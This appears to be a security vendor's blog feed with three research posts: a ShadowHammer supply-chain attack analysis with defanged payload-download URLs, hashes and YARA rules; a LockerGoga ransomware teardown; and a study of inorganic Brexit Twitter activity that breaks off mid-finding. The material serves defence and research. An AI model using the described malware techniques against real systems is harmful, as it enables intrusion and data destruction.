A Hammer Lurking In The Shadows

And then there was ShadowHammer, the supply chain attack on the ASUS Live Update Utility between June and November 2018, which was discovered by Kaspersky earlier this year, and made public a few days ago.

In short, this is how the trojanized Setup.exe works:

  1. An executable embedded in the Resources section has been overwritten by the first-stage payload.
  2. The program logic has been modified in such a way that instead of installing a software update, it executes a payload implemented as a shellcode.
  3. The payload enumerates the MAC addresses on the victim’s system, creates MD5 hashes of them and searches these hashes in a large array of hardcoded values.
  4. If there is a match, it downloads hxxps://asushotfix.com/logo.jpg or hxxps://asushotfix.com/logo2.jpg, depending on the payload variant. This is meant to be a second-stage x86 shellcode since it will try to execute it within its own process. However, these URLs are not accessible anymore.
  5. If no match, create or update a file “idx.ini”. (Added in July 2018 – more details below)

If you’re more interested in the technical details, our colleagues at Countercept have made an excellent write-up here.

More researchers jumped on this threat and wrote their own analysis as well, such as here and here.

In this post we will focus more on the differences between the variants we have discovered, and how the payload evolved over time. We will also cover some findings about the MAC addresses.


  1. June 2018: The beginning.

    In the first known versions, the embedded executable in the Setup.exe resource section has been partially overwritten by another smaller executable that contains the shellcode.
    The executable is not encrypted, and has a PDB string which is remarkable to say the least:


    The number of targeted MAC address hashes was very low. In the earliest sample we found, there were only 18 devices in scope.

    If there is a match, the shellcode will download the file from the following URL and execute it.

  2. Early July 2018: Introduction of the INI file.

    Some interesting functionality was added. If there is NO match with any of the targeted MAC addresses (which will be the case for most devices), the payload will create or update an INI file “idx.ini”.3 different entries are written with a date value corresponding to 7 days/one week later. Example content if it was created today (2019-03-29):


    The INI file is stored 2 levels up in the directory structure from where setup.exe is stored.

    So if the executable path is

    C:\Program Files (x86)\ASUS\ASUS Live Update\Temp\6\Setup.exe

    then the INI file will be dropped as

    C:\Program Files (x86)\ASUS\ASUS Live Update\idx.ini

    More MAC hashes were added per iteration, increasing the number to over 200 in a sample compiled on 23 July 2018.

  3. Mid August 2018: Going stealthy.

    Then there is a hiatus of a few weeks. Most people were enjoying summer at that time, but it looks like these actors spent that period on rewriting a few things to hide their payload better.The malicious payload is now fully encrypted, and has become real shellcode, i.e. not part of an executable image. Consequently, the PDB string is gone, and there is no compilation timestamp anymore, which makes determining the exact date of creation trickier. From here on, we are resorting to the date of first seen.The list of targets grew again, nearly 300 devices now.
  4. Early September 2018: A new URL.

    A small but interesting change was that the URL changed to


    Also, a few more hashes were added, totaling 307 entries, the largest number we have encountered.

  5. Late September 2018: Revisiting the targets.

    Until now, the evolution of the targeted MAC addresses was very consistent: the actors have only added targets. In other words, an older sample always contained a subset of the newer sample. Things have changed during the final period of the attack which lasted for more than a month. The number of hashes started fluctuating – with each new variant, some got removed, while new ones were added. Perhaps the threat actors managed to come up with a shortlist of targets of interest this time?

MAC Addresses Observations

Looking at the list of MAC addresses, it appears that some of them are wireless adapters from different manufacturers. It’s possible that the attackers gathered these by listening on a wireless network. Also, it suggests that the targets are mostly laptops as most of the wireless adapters seem to be Intel / Azurewave / Liteon.

If you notice in the chart above, there were about 6 MAC addresses that didn’t resolve to any vendors:


0c:5b:8f:27:9a:64, which was found in 8 samples, appears to be a Huawei wireless chip address. It is not assigned to Huawei, but looks like it’s being used in
Huawei E3372 devices, which is a 4G USB stick. This particular MAC address is always checked along with a specific Asustek Computer Inc. MAC address.

00ff5eXXXXXX is always checked along with a VMWare MAC address, which suggests that this MAC address is used in virtualized environments.

In the most recent sample, there were a total of 18 devices of interest. But here are those that were checked as matches:

  • Hon Hai Precision Ind. Co.,ltd. and Vmware, Inc.
  • Azurewave Technology Inc. and Asustek Computer Inc.
  • Intel Corporate and Asustek Computer Inc.
  • Vmware, Inc. and the 00ff5eXXXXXX MAC address

Indicators of Compromise


b0416f8866954196175d7d9a93b9ab505e96712c 2018-06-12 24 18
5039ff974a81caf331e24eea0f2b33579b00d854 2018-06-28 69 50
e01c1047001206c52c87b8197d772db2a1d3b7b4 2018-07-10 75 55
c6bd8969513b2373eafec9995e31b242753119f2 2018-07-16 156 117
2c591802d8741d6aef1a278b9aca06952f035b8f 2018-07-17 197 152
0595e34841bb3562d2c30a1b22ebf20d31c3be86 2018-07-23 294 208
df4df416c819feb06e4d206ea1ee4c8d07c694ad 2018-08-13 404 287
8e0dfaf40174322396800516b282bf16f62267fa 2018-09-05 433 307
4a8d9a9ca776aaaefd7f6b3ab385dbcfcbf2dfff 2018-09-25 141 86
e793c89ecf7ee1207e79421e137280ae1b377171 2018-09-30 75 41
9f0dbf2ba3b237ff5fd4213b65795595c513e8fa 2018-10-12 22 15
e005c58331eb7db04782fdf9089111979ce1406f 2018-10-19 24 18

YARA Rules

// older samples - check the PDB string in the shellcode
rule shadowhammer_pdb
        $str_pdb = "AsusShellCode.pdb" ascii nocase
        all of them
// newer samples - check manual patches in the setup.exe
rule shadowhammer_patch
        $str_msi  = "\\419.msi" ascii wide nocase
        $str_upd = "ASUS Live Updata" ascii wide nocase
        $str_ins = "Asusaller Application" ascii wide nocase
        2 of them

Analysis of LockerGoga Ransomware

We recently observed a new ransomware variant (which our products detect as Trojan.TR/LockerGoga.qnfzd) circulating in the wild. In this post, we’ll provide some technical details of the new variant’s functionalities, as well as some Indicators of Compromise (IOCs).


Compared to other ransomware variants that use Window’s CRT library functions, this new variant relies heavily on the less commonly used Boost library. For example, instead CRT’s rename function, it uses boost::filesystem::rename. The change makes technical analysis more difficult for researchers, as it makes function identification harder.

The functionalities for file enumeration and file encryption are split into different processes. File path sharing happens using the Boost.Interprocess library, which makes it harder to analyze the processes separately.

File encryption

If we execute the sample without any arguments, it moves the executable to the %TEMP% directory with hard coded name “tgytutrc{number}.exe” and executes it with the “-m” argument (where “m” stands for “master process”):

As we can see on the screenshot, the main executable uses functions from Boost library to copy and execute the sample.



The main functionality is inside the “master” process, it enumerates files on the infected system and executes child processes to encrypt files.

If we provide additional argument “-l”, the process will create “C:\\.log.txt” file and write file paths and error messages.

To parse command line arguments, the sample uses Boost.Program_options library (ref. screenshot below)


Before starting the encryption phase, the “master” process enumerates sessions and logs off from all but the current process’s session.

The process uses ProcessIdToSessionId function to get a session associated with the current process.


This is a list of active sessions on a test machine since session “1” is the session of the process, it logs off only from session “0”:


After that, the “master” process changes the password for all administrator accounts to “HuHuHUHoHo283283@dJD“.

I’ve created a standard user, but it only changes the password for administrator accounts:


The “master” process creates a “shared memory” using the Boost.Interprocess library and executes child processes (in the same executable) with the argument “-i SM-tgytutrc -s”, where “-i ” specifies a shared section name and “-s” stands for “slave”.

According to Wikipedia: “shared memory is memory that may be simultaneously accessed by multiple programs with an intent to provide communication among them or avoid redundant copies

On the screenshot, we see that, after changing passwords, it uses Boost library to initialize shared memory and execute child processes (“slave” processes):



Next, the “master” process enumerates files and writes their paths (encoded with Base64) in the shared memory.

The process uses Boost::Filesystem library to query paths, files, and directories:


File paths are encoded with Base64:


Child processes decode the data from the shared memory.
The data on the shared memory has the following structure: The first “DWORD” represents the file index, while the second one represents the size of the “base64” encoded data:


After decoding a file path, a child process generates a key/IV pair using the Crypto++ library.

OS_RNG” function uses CryptoGenRandom function from Windows, another function is from Crypto++ library to generate a random numbers:


Before the encryption, a “slave” process renames a file using Boost::Filesystem::rename function:

third_remove_locked_and_rename_to_lockedNext, the child process encrypts the file’s content using the Rijndael algorithm. It also appends the generated key/IV pair in an encrypted form to the end of the file. The key/IV pair is encrypted with the public key, which is embedded in the executable:


After it encrypts a file, a child process overwrites the first byte of the encoded data in shared memory with a “0” byte.


Network changes

After the encryption phase, the “master” process enumerates all network interfaces and disables them.

List of active adapters on my test machine:


The “master” process disables them one by one:


Next, it deletes the executable via “.bat” file which contains commands to delete the executable and the bat file itself.


At the end it logs off the current process’s session:



Overall, the latest variant of the LockerGoga ransomware is not complex or complicated. Because it uses the Boost library and Crypto++ instead of the more common CRT library functions however, it does make it a bit more troublesome for a threat researcher to analyze the sample.

Indicators of compromise (IOCs)


  • C97d9bbc80b573bdeeda3812f4d00e5183493dd0d5805e2508728f65977dda15

Hard coded mutexes:

  • MX-tgytutrc

Directory with malicious executables:

  • %APPDATA%\Local\Temp\tgytutrc8.exe

Analysis Of Brexit-Centric Twitter Activity

This is a rather long blog post, so we’ve created a PDF for you to download, if you’d like to read it offline. You can download that from here.

Executive Summary

This report explores Brexit-related Twitter activity occurring between December 4, 2018 and February 13, 2019. Using the standard Twitter API, researchers collected approximately 24 million tweets that matched the word “brexit” published by 1.65 million users.

A node-edge graph created from the collected data was used to delineate pro-leave and pro-remain communities active on Twitter during the collection period. Using these graphs, researchers were able to identify accounts on both sides of the debate that play influential roles in shaping the Brexit conversation on Twitter. A subsequent analysis revealed that while both communities exhibited inorganic activity, this activity was far more pronounced in the pro-leave group. Given the degree of abnormal activity observed, the researchers conclude that the pro-leave Twitter community is receiving support from far-right Twitter accounts based outside of the UK. Some of the exceptional behaviors exhibited by the pro-leave community included:

  • The top two influencers in the pro-leave community received a disproportionate number of retweets, as compared to influencer patterns seen in the pro-remain community
  • The pro-leave group relied on support from a handful of non-authoritative news sources
  • A significant number of non-UK accounts were involved in pro-leave conversations and retweet activity
  • Some pro-leave accounts tweeted a mixture of Brexit and non-Brexit issues (specifically #giletsjaunes, and #MAGA)
  • Some pro-leave accounts participated in the agitation of French political issues (#franceprotests)

The scope of this report is too limited to conclusively determine whether or not there is a coordinated astroturfing campaign underway to manipulate the public or political climate surrounding Brexit. However, it does provide a solid foundation for more investigation into the matter.


Social networks have come under fire for their inability to prevent the manipulation of news and information by potentially malicious actors. These activities can expose users to a variety of threats.  And recently, the spread of disinformation and factually inaccurate statements to socially engineer popular opinion has become a significant concern to the public. Of particular concern is the coordination of actions across multiple accounts in order to amplify specific content and fool underlying algorithms into falsely promoting amplified content to users in their news feeds, searches, and recommendations. Participants in these campaigns can include: fully automated accounts (“bots”), cyborgs (accounts that use a combination of manual and automated actions), full-time human operators, and users who inadvertently amplify content due to their beliefs or political affiliations. Architects of sophisticated social engineering campaigns, or astroturfing campaigns (fabricated social network interactions designed to deceive the observer into believing that the activity is part of a grass-roots campaign), sometimes create and operate convincing looking personas to assist in the propagation of content and messages relevant to their cause. It is extremely difficult to distinguish these “fake” personas from real accounts.

Identifying suspicious activities in social networks is becoming more and more difficult. Adversaries have learned from their past experiences, and are now using better tactics, building better automation, and creating much more human-like sock puppets. Social networks now employ more sophisticated algorithms for detecting suspicious activity, and this forces adversaries to develop new techniques aimed at evading those detection algorithms. Services that sell Twitter followers, Twitter retweets, YouTube views, YouTube subscribers, app store reviews, TripAdvisor reviews, Facebook likes, Instagram followers, Instagram likes, Facebook accounts, Twitter accounts, eBay reviews, Amazon ratings, and anything else you could possibly imagine (related to social networks) can be purchased cheaply online. These services can all be found with simple web searches. For the more tech-savvy, a plethora of tools exist for automating the control of multiple social media accounts, for automating the creation and publishing of text and video-based content, for scraping and copying web sites, and for automating search engine optimization tasks.  As such, more complex analysis techniques, and much more in-depth study of the data obtainable from social networks is required than ever before.

Because of its open nature, and fully-featured API support, Twitter is an ideal platform for research into suspicious social network activity. By studying what happens on Twitter, we can gain insight into the techniques adversaries use to “game” the platform’s users and underlying algorithms. The findings from such research can help us build more robust recommendation mechanisms for both current and future social networking platforms.


Between December 4, 2018 and February 13, 2019, we used the standard Twitter API (from Python) to collect Twitter data against the search term “brexit”. The collected data was written to disk and then subsequently analyzed (using primarily Python and Jupyter notebooks) in order to search for suspicious activity such as disinformation campaigns, astroturfing, sentiment amplification, or other “meddling” operations.

At the time of writing, our dataset consisted of approximately 24 million tweets published by over 1.65 million users. 18 million of those were retweets published by 1.5 million users from tweets posted by 300,000 unique users. The dataset included 145,000 different hashtags, 412,000 different URLs and 700,000 unique tweets.

Suspicious activity (activity that appears inorganic or unnatural) can be difficult to separate from organic activity on a social network. For instance, a tweet from user with very few followers will normally fall on deaf ears. However, that user may once in a lifetime post something that ends up going “viral” because it was so catchy it got shared by other users, and eventually by influencers with many followers. Malicious actors can amplify a tweet to similar effect by instructing or coordinating a large number of accounts to share an equally unknown user’s tweet. This can be achieved via bots or manually operated accounts (such as what was achieved by Tweetdeckers in 2017 and 2018). Retweets can also be purchased online. Vendors that provide such services publish the purchased retweets from their own fleets of Twitter accounts which likely don’t participate in any other related conversations on the platform. Retweets purchased on this way are often published over a period of time (and not all at once, since that would arouse suspicion). Hence, detecting that a tweet has been amplified by such a service (and identifying the accounts that participated in the amplification) is only possible if those retweets are captured as they are published. Finding a small group of users that retweeted one account over several days, and that may have themselves appeared only once in a dataset containing over 20 million tweets and 300,000 users, is rather difficult.

Groups of accounts that heavily retweet similar content or users over and over can be indicative of automation or malicious behaviour, but finding such groups can sometimes be tricky. Nowadays sophisticated bot automation exists that can easily hide the usual tell-tale signs of artificial amplification. Automation can be used to queue a list of tweets to be published or retweeted, randomly select a portion of potentially thousands of slave accounts, and perform actions at random times, while specifically avoiding tweeting at certain times of the day to give the impression that real users are in control of those accounts. Real tweets and tweets from “share” buttons on news sites can be mixed with retweets to improve realism.

Another approach to finding suspicious behaviour on Twitter is to search for account activity patterns indicative of automation. In a vacuum, these patterns cannot be used to conclusively determine whether an account is automated, or designed to act as part of an astroturfing or disinformation campaign. However, identifying accounts with one or more suspicious traits can help lead researchers to other accounts, or suspicious phenomena, which may ultimately lead to finding evidence of foul-play. Here are some traits that may indicate suspiciousness:

  • While it is entirely possible for a bored human to tweet hundreds of times per day (especially when most of the activity is pressing the retweet button), accounts with high tweet volumes can sometimes be indicative of automation. In fact, some of the accounts we found during this research that tweeted at high volume tended to publish hundreds of tweets at certain times during the day, whilst remaining dormant the rest of the time, or published tweets at a uniform volume, with no pauses for sleep.
  • Accounts that are just a few days or weeks old tend to not have thousands of followers, unless they belong to a well-known celebrity who just joined the platform. New accounts that develop huge followings in a short period of time are suspicious, unless those followings can be explained by particular activity or some sort of pre-existing public status.
  • Accounts with a similar number of followers and friends can occasionally be suspicious. For instance, accounts controlled by a bot herder are sometimes programmatically instructed to follow each other, and end up having similar follower/friends counts. However, mechanisms also exist that promote a “follow-back” culture on Twitter. These mechanisms are often present in isolated communities, such as the far-right Twittersphere. Commercial services also exist that automate follow-back actions for accounts that followed them. The fact that the list of accounts followed by a user is very similar to that user’s list of friends can, unfortunately, be indicative of any of the above.
  • Accounts that follow thousands of other accounts, but are themselves followed by only a fraction of that number can occasionally be indicative of automation. Automated accounts that advertise adult services (such as porn, phone sex, “friend finders”, etc.) use this tactic to attract followers. However, there are also certain communities on Twitter that tend to reciprocate follows, and hence following a great deal of accounts (including “egg” accounts) is a way of “fishing” for follow-backs, and normal in those circles.
  • While it is true that many users on Twitter tend to like and retweet content a lot more than they write their own tweets, accounts that retweet more than 99% of the time might be controlled by automation (especially since it’s a very easy thing to automate, and can be used to boost the engagement of specific content). A few accounts that we encountered during our research had one pinned tweet published by “Twitter Web Client” whilst the rest of the account’s tweets were retweets published by “Twitter for Android”. This sort of pattern raises suspicion, since it could indicate that the account was manually created (and seeded with a single hand-written tweet) by a user at a computer, and then subsequently automated.
  • Accounts that publish tweets using apps created with the Twitter API, or from sources that are often associated with automation are not conclusively suspicious, but may warrant further examination. This is covered more extensively later in the article.
  • Temporal analysis techniques (discussed later in this article) can reveal robot-like behaviour indicative of automation. Some accounts are automated by design (e.g. automated marketing accounts, news feeds). However, if an account behaves in an automated fashion, and publishes politically polarizing content, it may be cause for suspicion.

During the first few weeks of our research, we focused on building up an understanding of the trends and topology of conversations around the Brexit topic. We created a simple tool designed to collect counts and interactions from the previous 24 hours’ worth of data, and present the results in an easily readable format. This analysis included:

  • counts of how many times each user tweeted
  • counts of how many times each user retweeted another user (amplifiers)
  • counts of how many times each user was retweeted by another user (influencers)
  • counts of hashtags seen
  • counts of URLs shared
  • counts of words seen in tweet text
  • a map of interactions between users

By mapping the interactions between users (users interact when they retweet, mention, or reply to each other), a node-edge graph representation of observed conversations can be built. Here’s a simple representation of what that looks like:

Lines connecting users in the diagram above represent interactions between those users. Communities are groups of nodes within a network that are more densely connected to one another than to other nodes, and can be discovered using community detection algorithms. To visualize the topology of conversation spaces, we used a graph analysis tool called Gephi, which uses the Louvain Method for community detection. For programmatic community detection purposes, we used the “multilevel” algorithm that is part of the python-igraph package (which is very similar to the algorithm used in Gephi). We often used graph analysis and visualization techniques during our research, since they were able to fairly accurately partition conversations between large numbers of accounts. As an example of the accuracy of these tools, the illustration below is a graph visualization created using about 24 hours’ worth of data collected around December 4, 2018.

Names with a larger font indicate Twitter accounts that are mentioned more often. It can be noted from the above illustration that that conversations related to pro-Brexit (leave) topics are clustered at the top (in orange) and conversations related to anti-Brexit (remain) topics are clustered at the bottom (in blue). The green cluster represents conversations related to Labour, and the purple cluster contains conversations about Scotland. People familiar with the Twitter users in this visualization will understand how accurately this methodology managed to separate out each political viewpoint. Visualizations like these illustrate that separate groups of users discuss opposing topics, with very little interaction between the two groups. Highly polarized issues, such as the Brexit debate (and many political topics around the world) usually generate graph visualizations that look like the above.

December 11: #franceprotests hashtag

On December 11, 2019, we observed the #franceprotests hashtag trending in our data (something we had not previously seen). Isolating all tweets from 24 hours’ worth of previously collected data, we found 56 separate tweets that included the #franceprotests hashtag. We mapped interactions between these tweets and the users that interacted with them, resulting in this visualization:

From the above visualization, we can clearly observe a large number of users interacting with a single tweet. This particular tweet (id: 1069955399917350912) was responsible for a majority of the occurrences of the #franceprotests hashtag on that day. This is the tweet:

The reason this tweet showed up in our data was because of the presence of the #BREXIT hashtag. From this 24 hours’ worth of collected data, we isolated a list of 1047 users that retweeted the above tweet. Interactions between these users from across the 24-hour period looked like this:

Of note in the above visualization are accounts such as @Keithbird59Bird (which retweeted pro-leave content at high volume across our entire dataset), @stephenhawes2 (a pro-leave account that exhibits potentially suspicious activity patterns), @SteveMcGill52 (an account that tweets pro-leave, anti-muslim, and US-related right wing content at high volume). The @lvnancy account that published the original tweet is a US-based alt-right account with over 50,000 followers.

At the time of writing, 23 of these 1047 accounts (2.2%) had been suspended by Twitter.

We performed a Twitter history search for “#franceprotests” in order to determine which accounts had been sharing this hashtag. The search captured roughly 5,800 tweets published by just over 3,617 accounts (retweets are not included in historical searches). Searching back historically allowed us to determine that the current wave of #franceprotests tweets started to pick up momentum around November 28, 2018. In addition to the #franceprotests hashtag, this group of users also published tweets with hashtags related to the yellow vests movement (#yellowvest, #yellowjackets, #giletsjaunes), and to US right-wing topics (#MAGA, #qanon, #wwg1wga). Interactions between the accounts found in that search look like this:

Some of the accounts in this group are quite suspicious looking. For instance, @tagaloglang is an account that claims to be themed towards learning the Tagalog language. The pinned tweet at the top of @tagaloglang’s timeline makes the account appear in-theme when the page loads:

However, scroll down, and you’ll notice that the account frequently publishes political content.

Another odd account is @HallyuWebsite – a Korean-themed account about Kpop. Here’s what the account looks like when you visit it:

Again, this is just a front. Scroll down and you will see plenty of political content.

Both @tagaloglang and @ HallyuWebsite look like accounts that might be owned by a “Twitter marketing” service that sells retweets.

The 5,800 tweets captured in this search had accumulated a total of 53,087 retweets by mid-February 2019. Here are a few of the tweets that received the most retweets:

At the time of writing, 66 of the 3,617 accounts (1.83%) identified as historically sharing this hashtag had been suspended.

Throughout our research, we observed many English-language accounts participating in activism related to the French protests, often in conjunction with UK, US, and other far-right themes. We would imagine that a separate research thread devoted to the study of far-right activism around the French protests would likely expose plenty of additional suspicious activity.

December 20: suspicious pro-leave amplification

During our time spent studying the day-to-day user interactions, we became familiar with the names of accounts that most often tweeted, and of those that were most often retweeted. On December 20, 2018 we noticed a few accounts that weren’t normally highly retweeted that made it onto our “top 50” list. We isolated the interactions between these accounts, and the accounts that retweeted them, and produced the following visualization:

As illustrated above, several separate groups of accounts participated in the amplification of a small number of tweets from brexiteer30, jackbmontgomery, unitynewsnet and stop_the_eu. Here is a visualization of tweets from those accounts, and the users who interacted with them:

5,876 accounts participated in the amplification captured on December 20, 2018. In order to discover what other accounts these 5,876 accounts were amplifying, we collected the last 200 tweets from each of the accounts, and mapped all interactions found, generating this graph:

Zooming in on this, we can see that the yellow cluster at the bottom contains US-based “alt-right” Twitter personalities (such as Education4Libs, and MrWyattEarpLA – an account that is now suspended), and US-based non-authoritative news accounts (such as INewsNet).

The large blue center cluster contains many EU-based right-wing accounts (such as Stop_The_EU, darrengrimes_, and BasedPoland), and non-authoritative news sources (such as UnityNewsNet, V_of_Europe). It also contains AmyMek, a radical racist US Twitter personality with over 200,000 followers.

The orange cluster at the top contains interactions with pro-remain accounts. Although we weren’t expecting to see any interactions of this nature, they were most likely introduced by accounts in the dataset that retweet content from both sides of the debate (such as Brexit-themed tweet aggregators).

Many of the 5,876 accounts that participated in the December 20, 2018 amplification contained #MAGA (Make America Great Again hashtag commonly used by the alt-right), had US cities and states set as their locations, or identified as American in one way or another. At the time of writing, 79 of these 5,876 accounts (1.34%) had been suspended by Twitter.

February 12: non-authoritative news accounts

The presence of interactions with a number of non-authoritative, pro-leave news sources that are supportive of far-right activist Tommy Robinson (such as UnityNewsNet, PoliticalUK, and PoliticaLite) in this data led us to explore the phenomenon a little further. We ran analysis over our entire collected dataset in order to discover which accounts were interacting with, and sharing links to these sources. The data reveals that some users retweeted the accounts associated with these news sources, others shared links directly, and some retweeted content that included those links. Using our collected data, we were able to build up a picture of how these links were being shared between early December and mid-February. The script we ran looked for interactions with the following accounts: “UnityNewsNet”, “AltNewsMedia”, “UK_ElectionNews”, “LivewireNewsUK”, “Newsflash_UK”, “PoliticsUK1”, “Politicaluk”, “politicalite”. It also performed string searches on any URLs embedded in tweets for the following: “unitynewsnet”, “politicalite”, “altnewsmedia”, “www-news”, “patriotnewsflash”, “puknews”.

Overall, we discovered that 7,233 accounts had either shared (or retweeted) links to these news sites, or retweeted their associated Twitter accounts. A total of 15,337 retweets were found from the dataset. The UnityNewsNet Twitter accounts was the most popular news source present in our dataset. It received 8,119 retweets by a total of 4,185 unique users. In second place was the UK_ElectionNews account with 1,293 retweets from 1,182 unique users, and in third place was politicalite with 494 retweets from 351 unique users.

A total of 9,193 Tweets were found in the dataset that shared URLS that matched the string searches mentioned above. Again, Unity News Network was the most popular – URLs that matched “unitynewsnet” were tweeted a total of 5542 times by 2928 unique users. Politicalite came in second – URLs that matched “politicalite” were tweeted a total of 3300 times by 2197 unique users. In third place was Newsflash_UK – URLs that matched “patriotnewsflash” were tweeted a total of 239 times by 65 unique users. Here is a graph visualization of all the activity that took place between the beginning of December 2018 and mid-February 2019:

Names that appear larger in the above visualization are account names that were retweeted more often. We can see more names here than the originally queried accounts because many links to these sites were shared by users retweeting other accounts that shared a link. Here’s a closer zoom-in:

At the time of writing, 130 of the 7,233 accounts (1.79%) identified to be sharing content related to these non-authoritative new sources had been suspended by Twitter.

The figures and illustrations shown above were obtained from a dataset of tweets that matched the term “brexit”. This particular analysis, unfortunately, didn’t give us full visibility into all activity around these “non-authoritative news” accounts and the websites associated with them that happened on Twitter between early December 2018 and mid-February 2019. In order to explore this phenomenon further, we performed historical Twitter searches for each of the account names in question (collecting data from between December 4, 2018 and February 12, 2019). This allowed us to examine tweets and interactions that weren’t captured using the search term “brexit”. Historical Twitter searched only return tweets from the accounts themselves, and tweets where the accounts were mentioned. Unfortunately, no retweets are returned by a search of this kind.

The combined dataset (over all 7 searches) included 30,846 tweets and 12,026 different users.

Combining the data from historical searches against all seven account names, we were able to map interactions between each news account and users that mentioned it. Here’s what it looked like:

Here’s a zoomed-in view of the graph around politicalite and altnewsmedia:

Note the presence of @prisonplanet (Paul Joseph Watson) and @jgoddard230616 (James Goddard, the star of several recent “yellow vests” harassment videos), amongst other highly-mentioned far-right personalities.

Also of interest is the set of users coloured in purple in the following visualization:

The users in the purple cluster were found from the data we collected using a Twitter search for “unitynewsnet”. With the exception of V_of_Europe, each of these accounts is mentioned exactly the same number of times (522 times) by other users in that dataset. This particular phenomenon appears to have been created by a rather long conversation between those 40ish accounts between January 14 and 16, 2019. The conversation started with a question about where to find “yellow vest”-related news. Since mentions are always inherited between replies, and both V_of_Europe and UnityNewsNet were mentioned in the first tweet in the thread, this explains why these tweets are present in this dataset. Using temporal analysis techniques (explained below), we were able to ascertain that a majority of the involved accounts pause, or tweet at reduced volume between 06:00 and 12:00 UK time, which is indicative of night time in US time zones. In fact, examining these accounts manually reveals that they are mostly US-based. V_of_Europe account is a non-authoritative news account (Voice of Europe) with over 200,000 followers.

This interesting finding illustrates the fact that sometimes a suspicious looking trend or spike may present itself when data is viewed from a certain angle. Further inspection of the phenomenon will then prove it to be largely benign.

At the time of writing, 159 of the 12.026 accounts (1.32%) discovered above had been suspended by Twitter.

Temporal Analysis

Temporal analysis methods can be useful for determining whether a Twitter account might be publishing tweets using automation. This section describes techniques, the results of which are included later in this document. Here are some common temporal analysis methods:

  • Gather a histogram of counts of time intervals between the publishing of tweets. Numerous high counts of similar time intervals between tweets can indicate robotic behaviour.
  • A “heatmap” of the time of day, and day of the week that an account tweets can be gathered. The heatmap can then be examined (either by eye, or programmatically) for anomalous patterns. Using this technique, it is easy to identify accounts that tweet non-stop, with no breaks. If this is the case, it is possible that some (or all) of the tweets are being published via automation.
  • A heatmap analysis may also illustrate that certain accounts publish tweets en-masse at specific times of the day, and remain dormant for many hours in between. This behavior can also be an indicator that an account is automated – for instance, this is somewhat common with marketing automation or news feeds.

Here are some interesting examples found from the dataset. Note that these examples are intended as illustration, and not as indications that the associated accounts are bots.

The stephanhawes2 account tweets in short bursts at specific times of the day, with no activity at any other time. The precise time windows during which this user tweets (18:00-20:59 and 00:00-01:59) looks odd. This account retweets a great deal of far-right content.

Here are the time deltas (in seconds) observed between the account’s last 3200 tweets. You’ll notice that a majority of the tweets are published between 5 and 15 seconds apart.

The JimNola42035005 account, which amplifies a lot of pro-leave content, pauses tweeting between 08:00 UTC and 13:00 UTC. This is indicative of a user not residing in the UK’s time zone.

The interarrival pattern for this account shows a strong tendency for multiple tweets to be published in rapid succession (5-30 seconds apart).

The tobytortoise1 account tweets at very high volume, and almost always shows up at or near the top of the most active users tweeting about Brexit. This is a pro-leave account. Here’s the heatmap for that account. Note the bursts of activity exceeding 100 tweets in an hour:

Here is the interarrival pattern for that account:

The walshr108 account, which publishes pro-leave content, appears to pause roughly around UK night-time hours. However, the interarrivals pattern of this account raises suspicion.

Over 350 of walshr108’s last 3200 tweets were published less than one second apart.

Unconventional source fields

Each published tweet includes a “source” field that is set by the agent that was used to publish that tweet. For instance, tweets published from the web interface have their source field set to “Twitter Web Client”. Tweets published from an iPhone have a source field set to “Twitter for iPhone”. And so on. Tweets can be published from a variety of sources, including services that allow tweets to be scheduled for publishing (for instance “IFTTT”), services that allow users to track follows and unfollows (such as “Unfollowspy”), apps within web pages, and social media aggregators. Twitter sources can be roughly grouped into:

  • Sources associated with manual tweeting (such as “Twitter Web Client”, “Twitter for iPhone”)
  • Sources associated with known automation services (such as “IFTTT”)
  • Sources that don’t match either of the above

While services that allow the automation of tweeting (such as “IFTTT”) can be used for malicious purposes, they can also be used for legitimate purposes (such as brand marketing, news feeds, and aggregators). Malicious actors sometimes shy away from such services for two reasons:

  • It is easy for researchers to identify tweet automation by examining source fields
  • Sophisticated tools exist that allow bot herders to publish tweets from multiple accounts without the use of the API, and which can spoof their user agent to match legitimate sources (often “Twitter for Android”)

Despite the availability of professional bot tools, there are still some malicious actors that use Twitter’s API and attempt to disguise what they’re doing. One way to do this is to create an app who’s source field is a string similar to that of a known source (e.g. “Twitter for  Android” <- note that this string has two spaces between the words “for” and “Android”). Another way is to replace ascii characters with non-ascii characters (e.g. “Оwly” <- the “O” in this string is non-ascii). API-based apps can also “hide” by using source strings that look like legitimate product names – there are a plethora of legitimate apps available that all have similar-looking names: Twuffer, Twibble, Twitterfy, Tweepsmap, Tweetsmap. It’s easy enough to create a similarly absurd, nonsensical word, and hide amongst all of these.

Over 6000 unique source strings were found in the dataset. There is no definitive list of “legitimate” Twitter sources available, and hence each and every one of the unique source strings found must be examined manually in order to build a list of acceptable versus unacceptable sources. This process involves either searching for the source string, locating a website, and reading it, or visiting the account that is using the unknown source string and manually checking the “legitimacy” of that account. At the time of writing, we had managed to hand-verify about 150 source strings that belonged to Twitter clients, known automation services, and custom apps used by legitimate services (such as news sites and aggregators). We found roughly 2 million tweets across the entire dataset that were published with source strings that we had yet to hand-verify. These tweets were published by just under 17,000 accounts.

As mentioned previously, since there are dozens of legitimate services that allow Twitter to be automated, it isn’t easy to programmatically identify whether these automation sources are being used for malicious purposes. Each use of such a service found in the dataset would need to be examined by hand (or by the use of custom filtering logic for each subset of examples). This is simply not feasible. As such, using Twitter’s source field to determine whether suspicious, malicious, or automated behaviour is occurring is a complex endeavour, and one that is outside of the scope of the research described in this document.

Comparison of remain and leave-centric communities

We collected retweet interactions over our entire dataset and created a large node-edge graph. The reason why we only captured retweet interactions in this case was based on the assumption that if users wish to extend the reach of a particular tweet, they’d more likely retweet it than reply to it, or simply mention an account name. While the process of “liking” a tweet also seems to amplify a tweet’s visibility (via Twitter’s underlying recommendation mechanisms), instances of users “liking” tweets are, unfortunately, not available via Twitter’s streaming API.

The graph of all retweet activity across the entire collection period contained 219,328 nodes (unique Twitter accounts) and 1,184,262 edges (each edge was one or more observed retweet). Using python-igraph’s multilevel community detection algorithm, we partitioned the graph into communities. A total of 8,881 communities were discovered during this process. We performed string searches on the members of each identified community for high-profile accounts we’d seen engaging in leave and remain conversations throughout the research period, and were able to discover a leave-centric community containing 39,961 users and a remain-centric community containing 52,205 users. We then separately queried our full dataset with each list of users to isolate all relevant data (tweets, interactions, hashtags, and urls). Below are the findings from that analysis work.

Leave community

The leave-centric community comprised of 39,961 users. They published 1.1 million unique tweets, and a total of 4.3 million retweets across the dataset.

  • 2779 (6.95%) accounts that were seen at least 100 times in the dataset retweeted 95% (or more) of the time.
